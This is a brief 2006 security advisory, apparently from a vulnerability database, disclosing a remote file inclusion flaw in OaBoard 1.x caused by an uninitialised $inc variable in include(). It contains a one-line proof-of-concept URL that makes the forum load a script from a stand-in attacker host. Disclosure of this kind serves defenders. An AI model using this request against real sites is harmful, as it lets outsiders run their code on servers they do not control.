Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12905
HistoryMay 31, 2006 - 12:00 a.m.

OaBoard 1.0 Remote File inclusion

2006-05-3100:00:00
vulners.com
9

OaBoard version 1.x have remote file inclusion .
Variables $inc isn't initialized in the include()
http://host/oaboard/forum.php?inc=http://evil_script/
Hessam-x (www.hessamx.net)